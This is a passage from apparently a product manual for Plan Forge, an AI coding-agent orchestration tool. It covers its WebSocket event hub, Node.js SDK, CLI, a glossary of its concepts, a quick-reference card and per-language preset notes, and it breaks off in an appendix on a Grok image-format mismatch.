`/api/hub`	WebSocket event stream (see next section)	`WS /api/hub`

Every endpoint returns RFC 7807 ProblemDetails on error and a structured JSON object on success. The OpenAPI spec lives at GET /api/openapi.json if you need codegen.

WebSocket hub — `/api/hub`

The WebSocket hub is a broadcast channel that emits every event the orchestrator generates, plan starts, slice transitions, gate results, cost samples, bug filings, drift updates. It is the substrate the dashboard's live tiles render off.

Connecting

// Node.js
import { WebSocket } from "ws";
const ws = new WebSocket("ws://localhost:3100/api/hub", {
  headers: { Authorization: `Bearer ${process.env.PFORGE_API_TOKEN}` }
});

ws.on("message", (raw) => {
  const event = JSON.parse(raw.toString());
  console.log(event.type, event.payload);
});

Event shape

{
  "type":    "slice.commit",       // canonical event name
  "ts":      "2026-05-17T09:18:41Z",
  "actor":   "alice@example.com",
  "plan":    "Phase-31",
  "slice":   "2",
  "payload": { sha: "e4f5g6h", durationMs: 24100, gates: ["pass","pass"] }
}

The full event catalog, 38 event types across eight families with envelope, source/security_risk enums, payloads, and retention, lives in Appendix V — Event Catalog. The canonical JSON schema lives in pforge-mcp/EVENTS.md. Subscribe to all events or filter by type:

ws.send(JSON.stringify({
  subscribe: ["slice.*", "gate.fail", "bug.opened"]
}));

Custom dashboards: the entire /dashboard route is built on top of this WebSocket. If you want to embed Plan Forge progress into your own ops portal, point a WebSocket client at /api/hub, filter to the event types you care about, render. Zero polling.

`pforge-sdk` — the Node.js client

For TypeScript / JavaScript callers, pforge-sdk is a thin wrapper over the REST and WebSocket surfaces with typed responses and bundled helpers. It ships with four entry points:

Import	Contains
`pforge-sdk`	Core client, `createClient({ baseUrl, token })`, all REST methods, WebSocket subscriber
`pforge-sdk/tools`	Typed wrappers for every MCP tool, call any `forge_*` tool from Node.js
`pforge-sdk/hallmark`	Hallmark stamp helpers, sign / verify generated artifacts
`pforge-sdk/chunker`	Plan-chunker, split long plans into Scope-Contract-aligned slices for execution

Worked example

import { createClient } from "pforge-sdk";
import { forgeRunPlan, forgeEstimateQuorum } from "pforge-sdk/tools";

const client = createClient({
  baseUrl: "http://localhost:3100",
  token:   process.env.PFORGE_API_TOKEN
});

// Estimate before running (cost discipline, never hand-compute)
const est = await forgeEstimateQuorum(client, { plan: "docs/plans/Phase-31-PLAN.md" });
console.log("Cheapest mode:", est.recommendation);

// Execute
const run = await forgeRunPlan(client, {
  plan:   "docs/plans/Phase-31-PLAN.md",
  quorum: est.recommendation
});

// Subscribe to live events for this run
const sub = client.subscribe(["slice.*", "gate.*", "plan.complete"]);
for await (const event of sub) {
  if (event.plan !== "Phase-31") continue;
  console.log(event.type, event.payload);
  if (event.type === "plan.complete") break;
}

CLI — for scripts and humans

The CLI is the right surface for ad-hoc scripts, cron jobs, and direct human use. Every command has a --json flag for machine-readable output, so it composes cleanly with shell pipelines and CI scripts.

# Run a plan and pipe the result into jq
pforge run-plan docs/plans/Phase-31-PLAN.md --json | jq '.cost.totalUsd'

# Loop until a plan completes (useful in CI)
while [ "$(pforge plan-status --json | jq -r '.state')" != "complete" ]; do
  sleep 30
done

# Daily digest into Slack
pforge digest --post

# Cost rollup for the month
pforge cost-report --since=30d --json | jq '.byModel'

The full 97-command reference lives in Chapter 8 — CLI Reference. The pforge --help output is the canonical source.

Picking the right surface

Caller	Use	Why
GitHub Copilot / Claude / Cursor / Codex	MCP	Native transport; auto-discovered tools
GitHub Actions / GitLab CI / Jenkins	REST + CLI	Already speak HTTP and shell; no MCP transport in CI
Custom dashboard / status page	REST (initial) + WebSocket (live)	Snapshot on load, live updates after
Node.js script / automation	SDK	Typed responses; no transport boilerplate
cron job / one-shot batch	CLI	`--json` pipes cleanly; no long-running process
Mobile / web app / Slack bot	REST + WebSocket	Cross-platform; no Node.js requirement

Auth and secrets

All four surfaces share the same auth model:

Bearer tokens in the Authorization header (REST + WebSocket) or as PFORGE_API_TOKEN env var (CLI + SDK).
Tokens are issued via pforge auth issue [--scope=…] and stored in .forge/secrets.json (gitignored).
The MCP surface authenticates via the transport itself, stdio inherits the parent process trust; WebSocket MCP uses the same bearer token model.
Outbound API keys (Anthropic, OpenAI, xAI, Azure) live in .forge/secrets.json under providers.* or in environment variables. Never in code, never in committed config.

See also: Chapter 8 — CLI Reference for the full command catalog. Appendix W — REST API Reference for endpoint-by-endpoint REST docs. pforge-sdk/README.md for SDK reference. Chapter 7 — The Dashboard for the canonical example of a custom UI built on REST + WebSocket.

An ornate bronze card-catalog cabinet inside the Plan Forge shop, dozens of small drawers arranged in a grid each slightly open with small glowing amber tags hanging from their pulls, a librarian-smith pulling one drawer open to reveal small inscribed rune-stones with terms etched on them

Appendix A

Glossary

Every Plan Forge term defined.

Auto-generated from capabilities.mjs glossary, hand-edited for clarity.

Getting Started: Read These Five First

If you're new to Plan Forge, these five terms cover 80% of the manual. They build on each other in this order:

Plan Forge, the whole shop. A workshop with four stations (Smelt, Forge, Guard, Learn) that take an idea from "vague feature request" all the way to "shipped, monitored, and remembered."
Plan, a Markdown file in docs/plans/ that describes one feature. The unit of work Plan Forge operates on.
Scope contract, the section of the plan that says exactly which files are in-scope, out-of-scope, and forbidden. Without this, AI agents drift into unrelated code.
Slice, one numbered step inside a plan. Plans are broken into 3–7 slices so the AI works in checkpointed chunks. Each slice ends at a validation gate.
Validation gate, a concrete shell command (e.g., dotnet test) that must pass before the next slice runs. Gates are how Plan Forge knows the AI didn't break anything.

Read those five and you can follow the rest of the manual without backtracking. The full alphabetical reference begins below, organized by topic.

Core Concepts

Term	Definition
Plan Forge	The AI-Native SDLC Forge Shop. One workshop with four stations, Smelt, Forge, Guard, Learn, connected by gates, telemetry, and persistent memory. Covers every phase of the software lifecycle.
Forge	Shorthand for Plan Forge. Also: `.forge/` directory (project data), `.forge.json` (config).
Plan	A Markdown file in `docs/plans/` describing a feature. Contains slices, scope contract, and gates.
Hardened Plan	A plan that passed Step 2, locked-down execution contract with scope, slices, gates, forbidden actions.
Scope Contract	Plan section defining In Scope, Out of Scope, and Forbidden files. Prevents scope creep.
Slice	A 30–120 minute unit of execution within a plan. Has tasks, a validation gate, and optional dependencies. Commit-sized: small enough to catch failures early, large enough to be useful.
Validation Gate	Build + test commands that must pass at every slice boundary before proceeding.
Forbidden Actions	Files or operations the AI must not touch. Enforced by lifecycle hooks and scope checks.
Stop Condition	A condition that halts execution, e.g., "If migration fails, STOP."
Guardrails	Instruction files that auto-load based on the file being edited. 15–18 per preset.
Preset	Stack-specific configuration (dotnet, typescript, python, etc.). Determines which files are installed.
Extension	Community add-on providing instructions, agents, or prompts for a specific domain.
Self-Deterministic Agent Loop	The v2.58 system-wide model: the deterministic slice executor plus ten opt-in inner-loop subsystems (reflexion, trajectories, auto-skills, gate synthesis, postmortems, federation, reviewer, competitive execution, auto-fix, cost-anomaly). Execution stays reproducible; loop context improves each pass. See the canonical overview.
Phase	Versioned chunk of Plan Forge development. Plans live at `docs/plans/Phase-N-PLAN.md`. A phase contains 1+ plans; each plan contains 1+ slices. Numbering is monotonic across the project (Phase-28.2, Phase-31, etc.).
Tempering	Post-execution coverage & quality subsystem. Scans the diff with pluggable scanners (typecheck, lint, content-audit, secret-scan), classifies findings into real-bug / flaky / noise lanes, and feeds the Bug Registry. Distinct from LiveGuard (runtime defense) and the Reviewer Gate (architectural review). 5 MCP tools: `forge_tempering_run/scan/status/drain/approve_baseline`.
Skill	A multi-step procedure invoked from chat via a `/slash-command` (e.g. `/code-review`, `/staging-deploy`, `/health-check`). Defined as `SKILL.md` files under `.github/skills/`. Runs through `forge_run_skill` with its own validation gates.
Project Principles	Project-level guardrails generated by `.github/prompts/project-principles.prompt.md` and stored in `docs/plans/PROJECT-PRINCIPLES.md`. Auto-load via `project-principles.instructions.md` when the file exists. Define forbidden patterns, technology commitments, and architectural boundaries.
AI Plan Hardening Runbook	The canonical 7-step pipeline every plan flows through (Specify → Preflight → Harden → Execute → Sweep → Review → Ship). Master copy: `docs/plans/AI-Plan-Hardening-Runbook.md`.

The Four Stations

The Forge Shop's organizing taxonomy, every Plan Forge feature lives at one of these four stations.

Term	Definition
Forge Shop	The whole workshop. The collective name for the four stations and the connective tissue (gates, telemetry, memory) that ties them together.
Station	One of the four phase-specific zones in the Forge Shop. Each station has its own tools, agents, artifacts, and gate to the next station.
Act	The Manual's organizational unit. Each Act covers one station's chapters. Act I = Smelt (Ch 1–5), Act II = Forge (Ch 6–15), Act III = Guard (Ch 16–20), Act IV = Learn (Ch 21–24).
🪨 Smelt	Station 1, Intake → Scope Contract. Where rough ideas become hardened plans the Forge can execute. Houses the Specifier agent, the AI Plan Hardening Runbook, the Crucible, and Project Principles.
🔨 Forge (station)	Station 2, Scope Contract → shipped code. Where slices are struck against the anvil. Houses `pforge run-plan`, slice gates, quorum mode, auto-escalation, and the cost ledger.
🛡️ Guard	Station 3, Post-deploy defense. The watchtower. Houses LiveGuard (secret scan, drift, regression guard, env diff, incident capture), the Watcher, and the Remote Bridge.
🧠 Learn	Station 4, Memory and retrospectives. The brain above the bench. Houses OpenBrain, the Bug Registry, the Testbed, Health DNA, and Forge Intelligence.
Watcher	Tool (`forge_watch`, `forge_watch_live`) that tails another project's `pforge run` from a separate VS Code session. Read-only by contract, cannot modify the target.
Remote Bridge	Notification dispatcher that forwards hub events to Telegram, Slack, Discord, OpenClaw, or a generic webhook. Used for phone-friendly progress updates and approval prompts.
Bug Registry	Closed-loop scanner-bug tracker. Four tools, `forge_bug_register`, `forge_bug_list`, `forge_bug_update_status`, `forge_bug_validate_fix`. Records live in `.forge/bugs/<bugId>.json`.
Bug Fingerprint	Hash of scanner name + test name + assertion message + normalized stack trace. Re-registering a duplicate fingerprint returns `DUPLICATE_BUG` with the existing `bugId`.
Bug Status	State machine: `open → in-fix → validating → fixed`, with side branches to `wont-fix`, `duplicate`, and `noise`. Illegal transitions return `INVALID_TRANSITION`.
Bug Classifier	Heuristic that labels evidence as `real-bug` (persisted), `flaky` (ignored), or `noise` (discarded). Only `real-bug` writes to `.forge/bugs/`.
Testbed	Tool (`forge_testbed_run`) that replays scenario fixtures against a dedicated repo. Scenarios in `docs/plans/testbed-scenarios/.json`; findings in `docs/plans/testbed-findings/.json`. Feeds the Bug Registry and Health DNA.
Crucible	Smelt-station idea funnel for community extensions. Lifecycle: Submitted → Crystallized → Tempered → Hardened. Stalled Crystallized ideas surface as Watcher anomalies.

Pipeline

Term	Definition
Pipeline	The 7-step process: Specify → Preflight → Harden → Execute → Sweep → Review → Ship.
Step 0 (Specify)	Define what and why, structured specification with acceptance criteria.
Step 2 (Harden)	Convert spec into binding execution contract with slices, gates, and scope.
Step 3 (Execute)	Build code slice-by-slice. Can be automated or manual.
Step 5 (Review Gate)	Independent audit session, checks for drift, scope violations, and quality.
Step 1 (Preflight)	Verifies prerequisites before plan execution, git clean, build green, environment vars set. Ships as a prompt (`.github/prompts/step1-preflight-check.prompt.md`), not a separate agent persona.
Specifier	Step 0 agent persona that turns a one-line idea into a structured specification with acceptance criteria. Lives at `.github/agents/specifier.agent.md`.
Plan Hardener	Step 2 agent/runbook that converts a draft plan into a Hardened Plan by adding scope contract, validation gates, forbidden actions, and rollback. Lives at `.github/prompts/step2-harden-plan.prompt.md`.
Reviewer Gate	Step 5 agent persona that runs in a fresh session, reads the plan's Scope Contract, and audits the diff for drift and quality. Distinct from LiveGuard (runtime layer). Can be delegated to GitHub Copilot cloud agent via `forge_delegate_review`.
Shipper	Step 6 agent persona for commit, push, deploy, and close. Lives at `.github/agents/shipper.agent.md`.
Runbook (tool)	The `forge_runbook` MCP tool that exposes the AI Plan Hardening Runbook as a callable surface, agents can request the canonical step list, gate templates, and prompt URIs without re-reading the Markdown source.
Runbook	Bare term, in Plan Forge always refers to the AI Plan Hardening Runbook (the document) or the `forge_runbook` tool that exposes it. See both entries for specifics.
applyTo	Frontmatter field in instruction files that controls which files trigger auto-loading. Uses glob patterns (e.g., `*` for all files, `.cs` for C# only).

Execution

Term	Definition
Full Auto	Mode where `gh copilot` CLI runs each slice automatically. No human intervention.
Assisted	Mode where human codes in VS Code; orchestrator validates gates between slices.
Worker	The CLI process executing a slice, gh copilot, claude, or codex.
DAG	Directed Acyclic Graph, the dependency graph of slices determining execution order.
[P] tag	Parallel-safe marker on a slice header. Enables concurrent execution.
[depends: Slice N]	Dependency marker. Slice waits for N to complete before starting.
Quorum Mode	Multi-model consensus on slice execution: 3+ models analyze a slice independently, reviewer synthesizes best approach. Auto-winner. CLI: `--quorum=auto/power/speed/false`.
Quorum Auto	Threshold-based: only slices scoring above the complexity threshold use quorum.
Quorum Power	Multi-model consensus using flagship models (highest quality, highest cost). Complexity threshold 5. CLI: `--quorum=power`.
Quorum Speed	Multi-model consensus using fast models (lower quality, lower cost). Complexity threshold 7. CLI: `--quorum=speed`.
Quorum Advisory	Multi-model consensus on Forge-Master prompts (not slices). Returns all replies + dissent summary; human picks the reply. Configured via `forgeMaster.quorumAdvisory: "off" \| "auto" \| "always"`. Hard-blocked on operational, troubleshoot, build lanes.
Complexity Score	1–10 rating based on file scope, dependencies, security keywords, gate count, historical failure rate.
Escalation Chain	Model failover order: if Model A fails, try B, then C.
Forge-Master	Read-only reasoning orchestrator with three-stage intent classifier (keyword → embedding cache → router LLM). Lives at `forge_master_ask` + Studio dashboard tab. Phase-28 MVP, subsequently expanded with quorum advisory and unified timeline.
Forge-Master Observer	Background hub subscriber (`pforge-master/src/observer-loop.mjs`) that batches live Plan Forge events and narrates notable patterns in plain prose via the reasoning loop. Mute-by-default: enable with `forgeMaster.observer.enabled: true`. Budget-capped via `maxUsdPerDay` and `maxNarrationsPerHour`. Started with `pforge master observe --start [--detach]` or the `forge_master_observe` MCP tool.
Cross-Run Watcher	Watcher mode (`runWatch({ mode: "cross-run" })`) that aggregates `.forge/runs/*/summary.json` across multiple completed runs into a health snapshot. Detects recurring gate failures, retry-rate spikes, cost anomaly trends, and slice-timeout clusters. Feeds the A4 plan-health auditor agent when triggered by `hooks.postRun.invokeAuditor`.
Auditor Auto-Invoke	PostRun hook behavior (`hooks.postRun.invokeAuditor`) that automatically triggers the A4 plan-health auditor on run failure (`onFailure: true`) or every N completed runs (`everyNRuns: N`). The auditor report is written to `.forge/health/latest.md`. See forge-json-reference § hooks.postRun.
Embedding Cache	Stage 1.5 of the Forge-Master intent classifier. Cosine-similarity match (≥ 0.85) against previously-classified prompts. Zero API cost on hit, works fully offline once warm. 500-entry LRU.
CRITICAL_FIELDS	The six fields the Crucible critical-fields gate requires before finalizing: build-command, test-command, scope, validation-gates, forbidden-actions, rollback. Added v2.82.1.
Host-Aware Routing	Routing preference that detects the IDE/CLI host (VS Code, Claude Code, Cursor, Windsurf, Zed, CLI) and chooses CLI proxy vs direct API to honor whichever subscription the user is paying for. Modes: `auto / gh-copilot / direct-api / drop`.
DIRECT_API_ONLY	Routing class for models with no CLI proxy: `grok-`, `dall-e-`. Always require an API key (XAI_API_KEY / OPENAI_API_KEY).
COPILOT_SERVABLE	Routing class for `gpt-` / `chatgpt-` models. `gh-copilot` can proxy them via your Copilot subscription; direct API is fallback if `OPENAI_API_KEY` is set.

Components

Term	Definition
Smith	Diagnostic tool (`pforge smith`). Inspects environment, setup, version. Named after a blacksmith.
Sweep	Completeness scan (`pforge sweep`). Finds TODO/FIXME/stub markers.
Analyze	Consistency scoring (`pforge analyze`). Scores 0–100 across 4 dimensions.
Orchestrator	Execution engine. Parses plans, schedules slices, spawns workers, validates gates.
Hub	WebSocket event server. Broadcasts slice events to connected clients in real-time.
Dashboard	Web UI at `localhost:3100/dashboard`. 25 tabs for monitoring, cost, replay, skills, config, watcher, and LiveGuard.
Lifecycle Hook	Automatic actions tied to Plan Forge's pipeline: `PreDeploy`, `PreCommit`, `PreAgentHandoff`, `PostSlice` (configured via `.github/hooks/plan-forge.json`). Distinct from Claude Code's own hook names.
OpenBrain	The L3 memory layer. Self-hosted MCP server (PostgreSQL + pgvector) that provides cross-session, cross-tool semantic memory. Plan Forge ships with L1 (Hub) + L2 (`.forge/*.jsonl`) memory built-in; L3 requires OpenBrain. Without it, Reflexion lessons, Auto-skills, cross-project Federation, and 28 auto-capturing tools become inert. Recommended at install time; easy to add later via `pforge brain hint`. Deploy options: Docker, Supabase, Kubernetes, Azure. See srnichols.github.io/OpenBrain.
MCP	Model Context Protocol. A standard for AI agents to call functions. Plan Forge's MCP server exposes 102 tools (core + LiveGuard + Watcher + Crucible + Tempering + Bug Registry + Testbed + Forge-Master).
ACI	Agent-Computer Interface. The SWE-agent principle that an agent only performs as well as the surface lets it: bounded payloads, sparse fields, paginated lists, friendly empty-result messages. Enforced in Plan Forge via tool-surface temper guards in `architecture-principles.instructions.md`. `forge_search` is the reference standard.
Bridge	Notification dispatcher that forwards WebSocket hub events to external platforms (Slack, Discord, Telegram, generic webhooks).
Knowledge Graph	In-memory graph of Phase / Slice / Commit / File / Run / Bug nodes, queryable via `forge_graph_query`. Used by Forge-Master for cross-feature reasoning. See Chapter 28.
Cost Ledger	Aggregated token + dollar history across runs (`.forge/cost-history.json`). Powers `forge_cost_report`, anomaly detection, and the cost dashboard tab.
Worktree	Git worktree feature used by Plan Forge so multiple developers can run plans on the same repo without colliding. Each worktree gets its own `.forge/` directory and a row in the shared team-activity ledger.
Discovery Harness	4-pass build sequence (Harness → Wrapper → Execute → Auto-smelt) that crawls a running app, converts findings to Crucible smelts, runs slices with Tempering, and re-smelts failures into new bugs.
Spec Kit Interop	Bridge that imports GitHub Spec Kit projects via `forge_crucible_import` using deterministic field mapping (no LLM call). Spec Kit specs become Crucible smelts.
Foundry	Microsoft Foundry, the external Azure-hosted agent platform Plan Forge integrates with. Provides Foundry Toolboxes (MCP-compatible tool bundles), Foundry Agent Service (hosted agent runtime), and Foundry App Insights (OTel sink). See `foundry-quota.mjs` and the `microsoft-foundry` skill.
Lattice	v2.95 code-graph engine. Semantic chunk index plus BFS call-graph traversal for any git repository. Produces `.forge/lattice/chunks.jsonl` and `edges.jsonl`. Pure-JS chunker with optional tree-sitter upgrade. Five MCP tools: `index / stat / query / callers / blast`. CLI: `pforge lattice`.
Anvil	Δ-only memoization layer for the Lattice. Caches expensive analyses (chunk extraction, embedding lookups, gate replays) keyed by content hash; only recomputes the delta when source changes. CLI: `pforge anvil stat / purge`. Hit rate is reported by `forge_lattice_stat`.
Triage	Plan Forge's noise-vs-signal classifier surface. Two tools: `forge_alert_triage` (groups and prioritizes open LiveGuard alerts) and `forge_triage_route` (routes a finding to a lane, real-bug, flaky, noise, or human-review). CLI: `pforge triage`.
Timeline	Chronological event view exposed via `forge_timeline`, merges run events, gate results, commits, and incidents on a single axis for the current phase or slice.
Home Snapshot	Bounded activity overview returned by `forge_home_snapshot`. Pagination-friendly summary of recent runs, open bugs, drift score, and active plans, the default landing payload for Forge-Master and the Studio home tab.
Image Generation	Image synthesis surface (`forge_generate_image`) that proxies DALL-E / image models for chapter heroes, diagrams, and marketing assets. `DIRECT_API_ONLY`, requires `OPENAI_API_KEY`.
GitHub Metrics	Subsystem (`github-metrics.mjs`) that ingests PR / issue / commit metrics from the GitHub REST API and feeds them into Health DNA and Forge Intelligence. Paired with `github-introspect.mjs` for repo-shape introspection.

The Loops

Plan Forge nests four named loops inside its outer Self-Deterministic Agent Loop. Each loop has its own canonical chapter, entries below are the one-line cards.

Term	Definition
Inner Loop	The slice-level reasoning loop composed of the ten inner-loop subsystems (reflexion, trajectories, auto-skills, gate synthesis, postmortems, federation, reviewer, competitive execution, auto-fix, cost anomaly). Wraps every slice attempt. See Inner Loop deep dive.
Competitive Loop	Multi-model race pattern within slice execution. Two or more workers attempt the same slice in parallel; the orchestrator validates each and ships the winner. See Competitive Loop deep dive.
Audit Loop	Closed-loop bug discovery from a running system. Content-audit scanner → triage → drain cycle iterates until convergence. Default `off`; opt-in via `.forge.json#audit.mode`. Production environments hard-blocked. See Audit Loop deep dive.
Self-Deterministic Loop	Alias for Self-Deterministic Agent Loop. The system-wide outer loop that wraps the deterministic slice executor with all inner-loop subsystems.

Inner Loop Subsystems

The ten opt-in subsystems that compose the Inner Loop. Each is independently configurable; the Reviewer subsystem reuses the Step 5 Reviewer Gate agent persona (see Pipeline).

Term	Definition
Reflexion	Re-analyzes a failed slice attempt to extract a lesson learned; the lesson is persisted to memory and injected into the next attempt's context.
Trajectory	Captured record of a slice attempt (prompts, tool calls, gates passed/failed, model used, duration). Stored in `.forge/trajectories/`. The Inner Loop replays trajectories to learn from past runs.
Auto-skill	Auto-promotes a successful prompt pattern into a reusable Skill after 3+ uses. Generated skill lands at `.github/skills/<name>/SKILL.md` for human review.
Gate Synthesis	Proposes new validation gates based on observed slice failures. If three runs of the same plan fail at the same regression, Gate Synthesis suggests a gate that would have caught it.
Postmortem	Auto-generated retrospective after a failed run, written to `.forge/postmortems/`. Includes timeline, root cause hypothesis, and a fix proposal.
Federation	Cross-project intelligence sharing via OpenBrain. One project's lesson learned becomes another project's preflight check or postmortem hint.
Competitive Execution	Inner-loop flavor of the Competitive Loop, two models race on the same slice; first valid result wins. Cost-bounded by escalation chain policy.
Auto-fix	Proposes a 1–2 slice fix plan when a gate fails. Stored in `docs/plans/auto/`. Distinct from LiveGuard's Fix Proposal (which fires on post-deploy drift, not slice-time gate failure).
Cost Anomaly	Flags slices whose token cost is >2σ above their historical baseline. Triggers escalation chain review or quorum threshold adjustment.

LiveGuard

Term	Definition
Drift Score	Numeric score (0–100) measuring how closely code follows architecture guardrails. Lower = more violations.
Fix Proposal	Auto-generated 1–2 slice plan from LiveGuard findings. Stored in `docs/plans/auto/`.
LiveGuard	Post-coding operational intelligence layer. 14 MCP tools for drift, incidents, deploys, secrets, dependencies, and composite health checks.
MTTR	Mean Time To Resolve. Computed from incident capture to `resolvedAt` timestamp.
Secret Scan	Entropy-based scan of recent commits for potential hardcoded credentials.
OpenClaw	Optional external analytics service. Receives LiveGuard snapshots via POST for cross-project health monitoring.
Health DNA	Composite project health fingerprint: drift avg, incident rate, test pass rate, model success rate, cost per slice. Persisted to `.forge/health-dna.json`. Used for cross-session decay detection.
Forge Intelligence	Build-time self-improvement: auto-tuning escalation chains, cost calibration, adaptive quorum thresholds, slice splitting advisories. The forge gets smarter every run.
Recurring Incident	When 3+ incidents hit the same files in 30 days, LiveGuard auto-escalates severity and marks the pattern as systemic.
Deploy Journal	Append-only deploy history exposed via `forge_deploy_journal`. Each entry records environment, commit, slice range, gates passed, and outcome, the source of truth for "what shipped when" and the basis for rollback decisions.

Worker Guardrails

Term	Definition
PreCommit Chain	Ordered list of validation scripts declared in `hooks.preCommit.chain[]` that run before every slice commit.
Diff Classifier	The `forge_diff_classify` MCP tool that scans staged git diffs for security and quality issues.
Plan Lock Hash	SHA-256 hash stored in `lockHash` frontmatter; the orchestrator refuses to run if the plan body has drifted.
Tool Denylist	The `tools.deny` frontmatter field that strips listed MCP tools from the worker's session.
Network Allowlist	The `network.allowed` frontmatter field listing permitted hosts for outbound connections (currently log-only).

Data Structures

Term	Definition
Run	A single plan execution. Creates `.forge/runs/<timestamp>/` with results and traces.
Trace	OTLP-compatible JSON recording the full execution with spans, events, and timing.
OTLP	OpenTelemetry Protocol, the standard format for distributed traces. Plan Forge traces are OTLP-compatible and can be exported to Jaeger, Grafana Tempo, or any collector.
Span	A timed unit within a trace, run (root), slice (child), gate (grandchild).
Cost History	`.forge/cost-history.json`, aggregate token/cost data across all runs.
Index	`.forge/runs/index.jsonl`, append-only run registry for instant lookup.
SARIF	Static Analysis Results Interchange Format, the OASIS standard JSON schema CI scanners (CodeQL, Semgrep, ESLint, etc.) emit. Plan Forge converts SARIF files into hardenable plans via `sarif-to-plan.mjs`, turning third-party findings into Crucible smelts.

Appendix B

Quick Reference Card

Printable cheat sheet. Ctrl+P for a clean print.

CLI Commands

Command	Description
`pforge init`	Bootstrap project with setup wizard
`pforge check`	Validate setup files
`pforge smith`	Diagnose environment + setup health
`pforge status`	Show phase status from roadmap
`pforge new-phase <name>`	Create new phase plan + roadmap entry
`pforge branch <plan>`	Create git branch from plan
`pforge commit <plan> <slice>`	Auto-generate conventional commit
`pforge phase-status <plan> <status>`	Update phase status in roadmap
`pforge sweep`	Scan for TODO/FIXME markers
`pforge diff <plan>`	Compare changes vs scope contract
`pforge analyze <plan>`	Consistency scoring (0–100)
`forge_diagnose({ file })` (MCP tool)	Multi-model bug investigation
`pforge run-plan <plan>`	Execute plan (auto/assisted/estimate)
`pforge audit-loop [--auto]`	Run closed-loop drain. Off by default; opt-in via `.forge.json#audit`.
`pforge timeline [--source X --window 24h]`	Unified chronological view across 9 sources
`pforge ext search\|add\|list\|remove`	Extension management
`pforge update`	Update framework files
`pforge help`	Show all commands
`pforge tour`	Interactive guided walkthrough

LiveGuard Commands

Command	Description
`pforge drift`	Score codebase against guardrails
`pforge incident <desc>`	Capture an incident
`pforge triage`	Rank open alerts
`pforge dep-watch`	Scan dependency vulnerabilities
`pforge secret-scan`	Scan for hardcoded secrets
`pforge health-trend`	Health score over time

Pipeline Steps

Step	Name	Session	Agent
0	Specify	1	specifier
1	Pre-flight	1	—
2	Harden	1	plan-hardener
3	Execute	2	executor
4	Sweep	2	—
5	Review	3	reviewer-gate
6	Ship	4	shipper

Key Files

File	Purpose
`.forge.json`	Project config (preset, models, escalation, quorum)
`.github/copilot-instructions.md`	Master config, loads every session
`.github/instructions/*.instructions.md`	Auto-loading guardrails (15–18 files)
`.github/agents/*.agent.md`	Reviewer agents (19 total)
`.github/prompts/step*.prompt.md`	Pipeline prompt templates
`.github/skills/*/SKILL.md`	Slash command skills (13 total)
`.github/hooks/`	Lifecycle hooks (4 files)
`docs/plans/DEPLOYMENT-ROADMAP.md`	Phase tracker
`docs/plans/PROJECT-PRINCIPLES.md`	Non-negotiable commitments
`.forge/runs/`	Execution history, traces, logs
`.forge/cost-history.json`	Aggregate cost data

Ports & URLs

Port	URL	Purpose
3100	`localhost:3100/dashboard`	Dashboard UI + REST API
3100	`localhost:3100/ui`	Read-only plan browser
3101	`ws://localhost:3101`	WebSocket real-time events

Key Flags

Flag	Command	Effect
`--estimate`	run-plan	Cost prediction only
`--assisted`	run-plan	Human codes, orchestrator validates
`--resume-from N`	run-plan	Skip completed slices
`--quorum`	run-plan	Multi-model consensus
`--dry-run`	most commands	Preview without executing
`-Agent all`	init/setup	Generate files for all AI tools

A long workbench inside the Plan Forge shop covered with a fanned-out collection of leather tool-roll cases, each tool roll opened to reveal a specialized set of tools for a different craft tradition (smithing hammers, casting ladles, etching needles, measuring instruments), each tool roll labeled with a small bronze plaque

Appendix C

Stack-Specific Notes

Per-preset differences at a glance.

All presets share 4 universal instruction files, 8 cross-stack agents, and 6 pipeline agents. This appendix shows what's different per preset.

.NET (`dotnet`)

Property	Value
Build	`dotnet build`
Test	`dotnet test`
Framework	ASP.NET Core, Blazor, Dapper/EF Core
Testing	xUnit, NSubstitute, FluentAssertions
Unique files	`graphql.instructions.md`, `dapr.instructions.md`
Example plan	`Phase-DOTNET-EXAMPLE.md`
Detection	`.csproj` or `.sln` in root

TypeScript (`typescript`)

Property	Value
Build	`npm run build` / `tsc`
Test	`npm test` / `vitest`
Framework	Express, Fastify, Next.js
Testing	Vitest, Jest, Supertest
Unique files	`frontend.instructions.md` (React/Vue patterns)
Example plan	`Phase-TYPESCRIPT-EXAMPLE.md`
Detection	`tsconfig.json` or `package.json` in root

Python (`python`)

Property	Value
Build	`python -m py_compile`
Test	`pytest`
Framework	FastAPI, Django, Flask
Testing	Pytest, pytest-asyncio, httpx
Unique files	—
Example plan	`Phase-PYTHON-EXAMPLE.md`
Detection	`requirements.txt`, `pyproject.toml`, or `setup.py`

Java (`java`)

Property	Value
Build	`mvn compile` / `gradle build`
Test	`mvn test` / `gradle test`
Framework	Spring Boot, JPA, Hibernate
Testing	JUnit 5, Mockito, AssertJ
Unique files	—
Example plan	`Phase-JAVA-EXAMPLE.md`
Detection	`pom.xml` or `build.gradle`

Go (`go`)

Property	Value
Build	`go build ./...`
Test	`go test ./...`
Framework	Standard library, Chi router, Cobra CLI
Testing	testing package, testify
Unique files	—
Example plan	`Phase-GO-EXAMPLE.md`
Detection	`go.mod` in root

Swift (`swift`)

Property	Value
Build	`swift build` / `xcodebuild`
Test	`swift test`
Framework	SwiftUI, Vapor, Fluent
Testing	XCTest
Unique files	—
Example plan	`Phase-SWIFT-EXAMPLE.md`
Detection	`Package.swift` or `*.xcodeproj`

Rust (`rust`)

Property	Value
Build	`cargo build`
Test	`cargo test`
Framework	Tokio, Axum, sqlx
Testing	Cargo test, proptest
Unique files	—
Example plan	`Phase-RUST-EXAMPLE.md`
Detection	`Cargo.toml` in root

PHP (`php`)

Property	Value
Build	`composer install`
Test	`php artisan test` / `phpunit`
Framework	Laravel, Eloquent
Testing	PHPUnit, Pest
Unique files	—
Example plan	`Phase-PHP-EXAMPLE.md`
Detection	`composer.json` in root

Azure IaC (`azure-iac`)

Property	Value
Build	`az bicep build` / `terraform validate`
Test	`az deployment group what-if` / `terraform plan`
Framework	Bicep, Terraform, Azure CLI, azd
Testing	what-if / plan validation, Pester for PowerShell
Unique files	Replaces app-specific agents with: bicep-reviewer, terraform-reviewer, deploy-helper, azure-sweeper
Example plan	—
Detection	`.bicep`, `.tf`, or `azure.yaml` in root

Appendix D

Grok Image Generation Warnings

xAI Aurora MIME mismatch, root cause, impact, mitigations, and safe workflows.

KNOWN ISSUE: xAI Grok Aurora returns JPEG bytes regardless of requested format. If mismatched bytes enter a Claude conversation history, the session becomes unrecoverable. Current code mitigates this, read on for safe workflows.

The Problem

The xAI Grok image generation API (Aurora) returns JPEG bytes regardless of the format you request. When these bytes are passed through MCP tool results with a declared media_type: "image/png", the Claude API rejects the request:

Error message

invalid_request_error: The image was specified using the image/png media type,
but the image appears to be a image/jpeg image

Why Sessions Lock Up

